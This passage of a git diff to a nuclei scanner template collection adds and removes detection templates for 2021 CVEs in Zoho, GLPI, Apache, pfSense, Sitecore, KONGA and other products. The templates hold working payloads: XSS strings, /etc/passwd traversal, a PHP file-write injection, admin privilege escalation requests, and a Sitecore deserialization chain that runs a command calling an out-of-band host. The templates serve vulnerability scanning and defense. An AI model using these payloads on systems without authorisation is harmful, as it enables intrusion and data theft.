26" class="loginUserNameText' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' + internal: true + part: header +# digest: 490a0046304402204bbeed6302fbd74c4981446c4aec420dbd5e6b911f5f7a14f3e8b4d768c306fb02203c509944c3d418204a9b643c3a66e02ed59a5d53806b11c6c38444b56c217f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-37416.yaml b/nuclei-templates/CVE-2021/cve-2021-37416.yaml new file mode 100644 index 0000000000..7f39e871e9 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37416.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-37416 + +info: + name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. + remediation: | + Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + epss-score: 0.00118 + epss-percentile: 0.44933 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_adselfservice_plus + shodan-query: http.title:"ManageEngine" + tags: cve2021,cve,zoho,xss,zohocorp + +http: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and + + - type: status + status: + - 200 +# digest: 490a00463044022044a740d43743d6c86fa99d1d71e6331299ee72fdbcb93c5f5229ef1619021774022038b22cd63d9a3535d35f2588fddc0cfbfa48e7507fadda3beef37fbc2d36a204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-37538.yaml b/nuclei-templates/CVE-2021/cve-2021-37538.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-37538.yaml rename to nuclei-templates/CVE-2021/cve-2021-37538.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-37859.yaml b/nuclei-templates/CVE-2021/cve-2021-37859.yaml deleted file mode 100644 index bf79ee3b8b..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-37859.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2021-37859 - -info: - name: Mattermost XSS - author: imhunterand - severity: medium - description: reflected Cross-Site Scripting (XSS) via the OAuth flow - tags: cve,cve2021,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/oauth/shielder/mobile_login?redirect_to=%22%3E%3Cimg%20src%3D%22%22%20onerror%3D%22alert(document.domain)%22%3E" - - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - condition: and - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2021/cve-2021-38702.yaml b/nuclei-templates/CVE-2021/cve-2021-38702.yaml deleted file mode 100644 index cf51a9d3b3..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-38702.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-38702 - -info: - name: Cyberoam NetGenie XSS - author: geeknik - severity: medium - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. - reference: https://seclists.org/fulldisclosure/2021/Aug/20 - tags: cve,cve2021,cyberoam,netgenie,xss,router - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-38702 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-39211.yaml b/nuclei-templates/CVE-2021/cve-2021-39211.yaml new file mode 100644 index 0000000000..bf41c7f981 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-39211.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-39211 + +info: + name: GLPI 9.2/<9.5.6 - Information Disclosure + author: dogasantos,noraj + severity: medium + description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Information disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information. + remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. + reference: + - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 + - https://github.com/glpi-project/glpi/releases/tag/9.5.6 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-39211 + cwe-id: CWE-200,NVD-CWE-noinfo + epss-score: 0.00161 + epss-percentile: 0.51768 + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: glpi-project + product: glpi + tags: cve,cve2021,glpi,exposure,glpi-project + +http: + - method: GET + path: + - "{{BaseURL}}/ajax/telemetry.php" + - "{{BaseURL}}/glpi/ajax/telemetry.php" + + matchers-condition: and + matchers: + - type: word + words: + - '"uuid":' + - '"glpi":' + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100fe062755f4b07576ae5328bf856241f5ea8ffcd7471aee2f20d0e81118a750f7022100963f6ecde4366021315b1d07dede1e4330917c47e2ac4b7068b9c2496b1cc675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-40438.yaml b/nuclei-templates/CVE-2021/cve-2021-40438.yaml new file mode 100644 index 0000000000..f4e29f627b --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40438.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-40438 + +info: + name: Apache <= 2.4.48 - Mod_Proxy SSRF + author: pdteam + severity: critical + description: A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. + reference: + - https://firzen.de/building-a-poc-for-cve-2021-40438 + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 + tags: cve,cve2021,ssrf,apache,mod-proxy + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.00 + cve-id: CVE-2021-40438 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}/' + + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "Interactsh Server" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-40856.yaml b/nuclei-templates/CVE-2021/cve-2021-40856.yaml new file mode 100644 index 0000000000..e1e6d537de --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40856.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-40856 + +info: + name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass + author: gy741 + severity: high + description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. + reference: + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 + tags: cve,cve2021,comfortel,auth-bypass,auerswald + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-40856 + cwe-id: CWE-287 + +requests: + - raw: + - | + GET /about/../tree?action=get HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"TYPE"' + - '"ITEMS"' + - '"COUNT"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-40978.yaml b/nuclei-templates/CVE-2021/cve-2021-40978.yaml new file mode 100644 index 0000000000..81ec5d959e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40978.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-40978 + +info: + name: mkdocs 1.2.2 built-in dev-server allows directory traversal + author: pikpikcu + severity: high + reference: + - https://github.com/nisdn/CVE-2021-40978 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 + tags: cve,cve2021,mkdocs,lfi + description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-40978 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41277.yaml b/nuclei-templates/CVE-2021/cve-2021-41277.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41277.yaml rename to nuclei-templates/CVE-2021/cve-2021-41277.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41282.yaml b/nuclei-templates/CVE-2021/cve-2021-41282.yaml new file mode 100644 index 0000000000..c337bf85a5 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-41282.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-41282 + +info: + name: pfSense Arbitrary File Write to RCE + author: cckuailong + severity: high + description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. + reference: + - https://www.shielder.it/advisories/pfsense-remote-command-execution/ + - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-41282 + tags: cve,cve2021,pfsense,rce,authenticated + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-41282 + cwe-id: CWE-94 + +requests: + - raw: + - | + GET /index.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login= + + - | + GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /test.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + part: body + internal: true + group: 1 + regex: + - '(sid:[a-z0-9,;:]+)' + + matchers: + - type: dsl + dsl: + - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" + - "status_code==200" + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41467.yaml b/nuclei-templates/CVE-2021/cve-2021-41467.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41467.yaml rename to nuclei-templates/CVE-2021/cve-2021-41467.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-42192.yaml b/nuclei-templates/CVE-2021/cve-2021-42192.yaml deleted file mode 100644 index a4cd97729f..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-42192.yaml +++ /dev/null @@ -1,90 +0,0 @@ -id: CVE-2021-42192 - -info: - name: KONGA 0.14.9 - Privilege Escalation - author: rschio - severity: high - description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information or perform unauthorized actions. - remediation: | - Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor. - reference: - - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html - - https://www.exploit-db.com/exploits/50521 - - hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192 - - https://docs.google.com/document/d/1-YU9zWiDVUps3Mb6zos3996yvZ48vW_vfOvaJLLHc4I/edit?usp=sharing - - https://github.com/pantsel/konga/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-42192 - cwe-id: CWE-863 - epss-score: 0.04146 - epss-percentile: 0.91987 - cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: konga_project - product: konga - tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project - -http: - - raw: - - | - POST /login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"password": "{{password}}", "identifier": "{{username}}"} - - | - POST /api/user/{{id}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Content-Type: application/json;charset=utf-8 - - {"token": "{{token}}"} - - | - PUT /api/user/{{id}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Content-Type: application/json;charset=utf-8 - - {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"} - - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(body_2, "\"admin\":false") - - contains(body_3, "\"admin\":true") - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200 - - extractors: - - type: regex - name: id - group: 1 - regex: - - '"id":([0-9]+)' - internal: true - part: body - - - type: regex - name: token - group: 1 - regex: - - '"token":"(.*)"' - internal: true - part: body -# digest: 4b0a00483046022100fdd3cd578eccb46c7597fa360d4be47d04933a30e1027352fcb1360511dc0a98022100f80fb95b6ce25488c7e214ac936292ba31abd86939eb4972f6b9675d55f05272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-42237.yaml b/nuclei-templates/CVE-2021/cve-2021-42237.yaml deleted file mode 100644 index 34c06043d1..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-42237.yaml +++ /dev/null @@ -1,119 +0,0 @@ -id: CVE-2021-42237 - -info: - name: Sitecore Experience Platform Pre-Auth RCE - author: pdteam - severity: critical - description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. - reference: - - https://blog.assetnote.io/2021/11/02/sitecore-rce/ - - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 - - https://nvd.nist.gov/vuln/detail/CVE-2021-42237 - remediation: - For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - metadata: - shodan-query: http.title:"SiteCore" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-42237 - cwe-id: CWE-502 - tags: rce,sitecore,deserialization,oast - -requests: - - raw: - - | - POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - - foo - - - - 2 - - <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" - xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" - xmlns:a="http://schemas.datacontract.org/2004/07/System"> - - mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - - - - Compare - - - System.String - System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] - - Start - - System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - System.Diagnostics.Process - System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] - - - - - - System.Diagnostics.Process Start(System.String, System.String) - System.Diagnostics.Process Start(System.String, System.String) - 8 - - - - - - - Int32 Compare(System.String, System.String) - System.Int32 Compare(System.String, System.String) - 8 - - - - - 2 - - /c nslookup {{interactsh-url}} - cmd - - - - - - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms DNS Interaction - words: - - "dns" - - - type: word - part: body - words: - - "System.ArgumentNullException" diff --git a/nuclei-templates/CVE-2021/cve-2021-42566.yaml b/nuclei-templates/CVE-2021/cve-2021-42566.yaml deleted file mode 100644 index ce8fb35f82..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-42566.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-42566 - -info: - name: myfactory FMS - Reflected XSS - author: madrobot - severity: medium - description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. - reference: - - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-42566 - cwe-id: CWE-79 - tags: cve,cve2021,myfactory,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "" - condition: and - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-43062.yaml b/nuclei-templates/CVE-2021/cve-2021-43062.yaml new file mode 100644 index 0000000000..4be91bc361 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-43062.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-43062 + +info: + name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting + author: ajaysenr + severity: medium + description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-43062 + - https://www.fortiguard.com/psirt/FG-IR-21-185 + - https://www.exploit-db.com/exploits/50759 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-43062 + cwe-id: CWE-79 + tags: cve,cve2021,fortimail,xss,fortinet + +requests: + - method: GET + path: + - "{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "FortiMail Click Protection" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-43287.yaml b/nuclei-templates/CVE-2021/cve-2021-43287.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-43287.yaml rename to nuclei-templates/CVE-2021/cve-2021-43287.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-43778.yaml b/nuclei-templates/CVE-2021/cve-2021-43778.yaml deleted file mode 100644 index 15c78b3cdb..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-43778.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2021-43778 - -info: - name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability. - author: cckuailong - severity: critical - description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file.. - reference: - - https://github.com/AK-blank/CVE-2021-43778 - - https://nvd.nist.gov/vuln/detail/CVE-2021-43778 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2021-43778 - tags: glpi,cve,cve2021,lfi,plugin,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0" diff --git a/nuclei-templates/CVE-2021/cve-2021-44103.yaml b/nuclei-templates/CVE-2021/cve-2021-44103.yaml deleted file mode 100644 index 092e2b866b..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-44103.yaml +++ /dev/null @@ -1,78 +0,0 @@ -id: CVE-2021-44103 - -info: - name: KOGA 0.14.9 - Privilege Escalation - author: rschio - severity: high - description: Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. - reference: - - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html - - https://www.exploit-db.com/exploits/50521 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103 - classification: - cvss-score: 8.7 - cve-id: CVE-2021-44103 - cwe-id: CWE-264 - tags: cve,cve2021,konga,authenticated - -requests: - - raw: - - | - POST /login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"password": "{{password}}", "identifier": "{{username}}"} - - - | - POST /api/user/{{id}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Content-Type: application/json;charset=utf-8 - - {"token": "{{token}}"} - - - | - PUT /api/user/{{id}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Content-Type: application/json;charset=utf-8 - - {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"} - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_2, "\"admin\":false")' - - 'contains(body_3, "\"admin\":true")' - condition: and - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - name: id - internal: true - group: 1 - regex: - - '"id":([0-9]+)' - - - type: regex - part: body - name: token - internal: true - group: 1 - regex: - - '"token":"(.*)"' diff --git a/nuclei-templates/CVE-2021/cve-2021-44515.yaml b/nuclei-templates/CVE-2021/cve-2021-44515.yaml new file mode 100644 index 0000000000..ee675dcc14 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-44515.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-44515 + +info: + name: Zoho ManageEngine Desktop Central - Remote Code Execution + author: Adam Crosser + severity: critical + description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. + reference: + - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog + - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html + - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis + - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp + - https://nvd.nist.gov/vuln/detail/CVE-2021-44515 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-44515 + cwe-id: CWE-287 + epss-score: 0.97233 + epss-percentile: 0.99811 + cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_desktop_central + tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp + +http: + - raw: + - | + GET /STATE_ID/123/agentLogUploader HTTP/1.1 + Host: {{Hostname}} + Cookie: STATE_COOKIE=&_REQS/_TIME/123 + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "len(body) == 0" + + - type: word + part: header + words: + - "UEMJSESSIONID=" + + - type: status + status: + - 200 +# digest: 490a00463044022068d48f3ed1b18a18f6d8a7aab9d329d2ef1ab59ae7975558fcc658030c86758602202beae5f2b5f2ef43937f43f3cbf3feb749df245d2e841fa8df5963b2c96ae819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-44521.yaml b/nuclei-templates/CVE-2021/cve-2021-44521.yaml new file mode 100644 index 0000000000..0bd987b8a1 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-44521.yaml @@ -0,0 +1,59 @@ +id: CVE-2021-44521 + +info: + name: Apache Cassandra Load UDF RCE + author: Y4er + description: "When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE." + severity: critical + reference: + - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 + - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ + tags: cve,cve2021,network,rce,apache,cassandra + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.10 + cve-id: CVE-2021-44521 + cwe-id: CWE-94 + +network: + - inputs: + - data: "050000000500000000" + read: 1024 + type: hex + - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35" + read: 1024 + type: hex + - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" + read: 1024 + type: hex + - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b" + read: 1024 + type: hex + - data: 